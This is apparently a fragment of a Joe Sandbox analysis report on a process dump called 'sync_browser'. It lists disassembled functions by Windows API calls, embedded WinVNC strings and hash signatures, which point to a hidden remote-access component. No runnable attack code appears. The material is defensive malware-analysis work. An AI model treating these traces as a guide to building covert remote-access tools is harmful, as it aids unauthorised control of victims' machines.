                                                                    • Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true
                                                                    • Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CreateErrorLastThread_errno_getptd_invalid_parameter_noinfofree
                                                                    • String ID:
                                                                    • API String ID: 3283625137-0
                                                                    • Opcode ID: d7d1bbc1acb5388812442ca131e75b053374a14ef8d2c0d32f7c34c2cb7a35d3
                                                                    • Instruction ID: 9e2a2fe87be13c1a77f3cba1880c48f410dc2dfc96ab20e08c5c182d875d8feb
                                                                    • Opcode Fuzzy Hash: d7d1bbc1acb5388812442ca131e75b053374a14ef8d2c0d32f7c34c2cb7a35d3
                                                                    • Instruction Fuzzy Hash: 1D216231A0C781C5E658BBA5A5412BAE2A4FF44B90FC44235EE5D03BEACF3CF0518720

                                                                    Control-flow Graph

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true
                                                                    • Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: ComputerLibraryLoadName
                                                                    • String ID: RICHED32.DLL$Rich Edit Dll Loading$Unable to load the Rich Edit (RICHED32.DLL) control!
                                                                    • API String ID: 2278097360-3189507618
                                                                    • Opcode ID: a0e48cd9bca1a580f90c0fe309f8f060cfac1904e258431fe3c2638ac3c22389
                                                                    • Instruction ID: 227a250d48bf8559212ab46ba12df050a4d98eb558977c6b195d091cbdca0a0c
                                                                    • Opcode Fuzzy Hash: a0e48cd9bca1a580f90c0fe309f8f060cfac1904e258431fe3c2638ac3c22389
                                                                    • Instruction Fuzzy Hash: 6C317E21B1CB42C1EB98FB6AF45436966A1EB85B44F444138CA4D4B3F9EF3DE445C3A0

                                                                    Control-flow Graph

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true
                                                                    • Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: ProcessWindow$CurrentFindMessagePostThread
                                                                    • String ID: WinVNC Tray Icon
                                                                    • API String ID: 2660421340-1071638575
                                                                    • Opcode ID: 559e961aba49f3495be4a1de55413b2cc06c1e4dbc84eeda83157a0626d0a607
                                                                    • Instruction ID: eb40f4663e9a27456a59877e2fa47f196f5405a60a2c2bf91755aa9f2b4d12df
                                                                    • Opcode Fuzzy Hash: 559e961aba49f3495be4a1de55413b2cc06c1e4dbc84eeda83157a0626d0a607
                                                                    • Instruction Fuzzy Hash: 18018F2160CB81C2E704BB52B9440A6F660FF48BD4F944036EE5903B68EE3CE485C710
                                                                    APIs
                                                                    Strings
                                                                    • vncclient.cpp : A connection using DSM already exist - client rejected to avoid crash , xrefs: 00007FF740023490
                                                                    • vncclient.cpp : DSMPlugin Pointer to socket OK, xrefs: 00007FF740023429
                                                                    • vncclient.cpp : Invalid DSMPlugin Pointer, xrefs: 00007FF740023502
                                                                    • vncclient.cpp : failed to set socket timeout(%d), xrefs: 00007FF7400233D9
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true
                                                                    • Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: ErrorLast
                                                                    • String ID: vncclient.cpp : A connection using DSM already exist - client rejected to avoid crash $vncclient.cpp : DSMPlugin Pointer to socket OK$vncclient.cpp : Invalid DSMPlugin Pointer$vncclient.cpp : failed to set socket timeout(%d)
                                                                    • API String ID: 1452528299-2001727811
                                                                    • Opcode ID: df93f2ef96d673b5cdbd6a23393152ede06451180be3b72b44c2e476be1564a9
                                                                    • Instruction ID: 303140f941988b3c37e451f25b348f0a288869e4454c754ea91137b0a6e3038b
                                                                    • Opcode Fuzzy Hash: df93f2ef96d673b5cdbd6a23393152ede06451180be3b72b44c2e476be1564a9
                                                                    • Instruction Fuzzy Hash: 3F410766A09A45C1EB51BF26D4883ED67A1FB84F44F884076CA0D473A8DF39E989C321
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true
                                                                    • Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CriticalSection$malloc$CreateEnterErrorInitializeLastLeaveSemaphoregetpeernameinet_ntoa
                                                                    • String ID: <unavailable>
                                                                    • API String ID: 4131039871-1096956887
                                                                    • Opcode ID: 662e7cd3472f8606c1dbc32a9fae7d2c30d9cf2075c004d535a59fbb274039f5
                                                                    • Instruction ID: 11ee4f3dbaa40371da74d5cb821a2662f717e9e88c0e4eb12ff824036dc21853
                                                                    • Opcode Fuzzy Hash: 662e7cd3472f8606c1dbc32a9fae7d2c30d9cf2075c004d535a59fbb274039f5
                                                                    • Instruction Fuzzy Hash: 6A319E3261DB81C2EB54EF60E8443A9B3A4FB88B94F940135DAAD477A8DF3CE455C750
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true
                                                                    • Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: connectgethostbynamehtonsinet_addr
                                                                    • String ID:
                                                                    • API String ID: 599670773-0
                                                                    • Opcode ID: f6108e8ca93ccc89ffbbcef9ae7f28c2dc192bc10360c91e264abe9a68236526
                                                                    • Instruction ID: 5aef53be8e73d6f082fe7e1cac2d1e75b598ee8ffa8f6f20828bed72586727d7
                                                                    • Opcode Fuzzy Hash: f6108e8ca93ccc89ffbbcef9ae7f28c2dc192bc10360c91e264abe9a68236526
                                                                    • Instruction Fuzzy Hash: F0116626B1CA41C1EB64BB65E840739B6A1FF88B95F404535E95E477A8DF3CE500C724
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true
                                                                    • Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: _callnewh_errno$AllocHeapmalloc
                                                                    • String ID: bad allocation
                                                                    • API String ID: 3727741168-2104205924
                                                                    • Opcode ID: 921c28abbcbf2c5a57674bbbd0c3a74825746961c44d3ad5b5d496d2e089f50c
                                                                    • Instruction ID: c2b0eba704e3a61a47a145bd7ddeb8dcfc2e2d4889260b6c4aac84af1403de67
                                                                    • Opcode Fuzzy Hash: 921c28abbcbf2c5a57674bbbd0c3a74825746961c44d3ad5b5d496d2e089f50c
                                                                    • Instruction Fuzzy Hash: F601F765A0CA47D0EA14BB50B8506B9E3A0BF99380FD41135D98D867BAEF7CF245CB20
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true
                                                                    • Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: FindMessagePostWindow
                                                                    • String ID: WinVNC Tray Icon
                                                                    • API String ID: 2578315405-1071638575
                                                                    • Opcode ID: b55735387d5fcc8609d7e23d94c71180556838aa6ba5d63fb9eaeb7151e3a813
                                                                    • Instruction ID: 569895b5ec4f3117c6e58409430aea67af7432cb54459141610fc542dd37f6da
                                                                    • Opcode Fuzzy Hash: b55735387d5fcc8609d7e23d94c71180556838aa6ba5d63fb9eaeb7151e3a813
                                                                    • Instruction Fuzzy Hash: 46017126F1CA81C2EA54BB02F440269A291EB88BC4F885032EE5E5376DDF3CE5918F10
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true
                                                                    • Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: closesocketshutdown
                                                                    • String ID: vsocket.cpp : closing socket
                                                                    • API String ID: 572888783-2569437896
                                                                    • Opcode ID: 8dc3be72fa35b56882547eaf8baed56a0b94c43c4fc04f31f3c72a1815f57b02
                                                                    • Instruction ID: fcc6c041712fc9ed912bda04f7e8da329a76fa5eb4a27a86003d9f66c38e9456
                                                                    • Opcode Fuzzy Hash: 8dc3be72fa35b56882547eaf8baed56a0b94c43c4fc04f31f3c72a1815f57b02
                                                                    • Instruction Fuzzy Hash: 8FF049B5A18B41C2EB14BF74D4942B87322FF88B25FA04A35C92E463E9DF38E455C360
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true
                                                                    • Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CloseErrorHandleLast
                                                                    • String ID:
                                                                    • API String ID: 918212764-0
                                                                    • Opcode ID: 03b786ac0191571c2e0cd19829045d780b45d4398104a6852bd75eb283c44f71
                                                                    • Instruction ID: f6993b7455909d035ee248a43c5835f26e309e0651933b80b6d29690f0127b4e
                                                                    • Opcode Fuzzy Hash: 03b786ac0191571c2e0cd19829045d780b45d4398104a6852bd75eb283c44f71
                                                                    • Instruction Fuzzy Hash: 93211732A1DA46C6EB51BF60E490769A3A0FF84B44F940131EA8E43BACDF3CE445C760
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true
                                                                    • Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: selectsend
                                                                    • String ID:
                                                                    • API String ID: 2999949978-0
                                                                    • Opcode ID: e4fa7076d3caa874285a54a3ee283af3e05e33e5fe15350dd15a6e5305daa52a
                                                                    • Instruction ID: 59346325c2644ec981a9affafa78c7f62f5048d827e505d8c36d29ee22b20082
                                                                    • Opcode Fuzzy Hash: e4fa7076d3caa874285a54a3ee283af3e05e33e5fe15350dd15a6e5305daa52a
                                                                    • Instruction Fuzzy Hash: FE310826F1C682C6EA607B15A8447BAF392BF95798F851432DD4D07B69DF3EF4018620
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true
                                                                    • Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: AllocHeap_callnewh_errno
                                                                    • String ID:
                                                                    • API String ID: 849339952-0
                                                                    • Opcode ID: 168cf3911275e585727ccf2278bdf0a034da8738718f6c23c6dd903017626324
                                                                    • Instruction ID: 2af30711edb99f0650671a5815413d359cd28b7e6ed7f28606535150bc72fed3
                                                                    • Opcode Fuzzy Hash: 168cf3911275e585727ccf2278bdf0a034da8738718f6c23c6dd903017626324
                                                                    • Instruction Fuzzy Hash: 93118E21B0D242D1FE597F51E648778F291AF84BA4F888A30D95D46BECEF6CB4408620
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true
                                                                    • Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: FreeLibraryMessageSend
                                                                    • String ID:
                                                                    • API String ID: 3583424976-0
                                                                    • Opcode ID: 5a9c5ba6fc8a087abeda093f91cff5a2c035cde94b70426cc823780c6ac37473
                                                                    • Instruction ID: fbbf4a077e05d85b1169b1c06a532368078f654f957274b1c075136ea6eb769f
                                                                    • Opcode Fuzzy Hash: 5a9c5ba6fc8a087abeda093f91cff5a2c035cde94b70426cc823780c6ac37473
                                                                    • Instruction Fuzzy Hash: 3B111825F0E546E5FF69FFA19465678A364AF94B44F840535CE0E067B99E2DF480C320
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true
                                                                    • Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
